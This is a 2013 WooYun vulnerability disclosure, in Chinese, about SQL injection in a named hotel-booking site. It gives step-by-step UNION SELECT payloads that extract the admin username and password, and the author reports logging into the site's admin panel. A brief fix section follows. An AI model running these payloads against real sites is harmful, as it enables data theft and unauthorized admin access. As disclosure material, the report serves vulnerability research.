当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019625

漏洞标题:旅宿网SQL注入可登录后台随意操作

相关厂商:旅宿网

漏洞作者: 微微笑

提交时间:2013-08-25 21:21

修复时间:2013-10-09 21:22

公开时间:2013-10-09 21:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可能在建站的时候没有考虑过安全问题,数据库可以直接接收用户输入进行查询,没有进过任何字符过滤、条件判断等安全处理,导致SQL注入问题,可脱库。

详细说明:

1.查找注入点
http://www.pricehotel.cn/hskxread.php?id=1638

zhengchang.png



注入 效果
‘ 出错

and 1=1 正常

and 1=2 出错
结论:可注入。

2.获取数据
2.1 确定字段数
http://www.pricehotel.cn/hskxread.php?id=1638 order by 20 --

chucuo.png



依照此方法进行如下尝试:
注入 效果
order by 20 -- 出错
order by 10 -- 正常
order by 12-- 出错
order by 11 -- 正常
结论:注入点查询的数据表有11列
2.2 获得数据显示位置
http://www.pricehotel.cn/hskxread.php?id=1638 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11 --

dian.png



信息:2,3,5处可利用来显示查询到的信息。
2.3 获取数据库信息
and 1=2 union all select 1,@@version,3,4,5,6,7,8,9,10,11 --
图略

信息:数据库版本MySQL 5.5.23-log。
2.4提取目标数据
and 1=2 union all select 1,table_schema,3,4,5,6,7,8,9,10,11 from information_schema.tables—
图略

信息:information_schema数据库。
由于页面显示局限,仅能显示一条信息,不能罗列所有数据表,故采用工具。

gongju2.png


若工具没有读出具体数据,只获取了表名、列名也可以手工注入获取数据信息。
and 1=2 union select 1,admin_pwd,admin_name,4,5,6,7,8,9,10,11 from pricehoteldb.sysadmin --

info.png




漏洞证明:

3.查找后台
http://www.pricehotel.cn/admin/login.php
3.1尝试登陆

login.png



3.2登陆成功

success.png


接下来的操作没有任何障碍,此处略。

修复方案:

验证所有输入
处理特殊字符

版权声明:转载请注明来源 微微笑@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝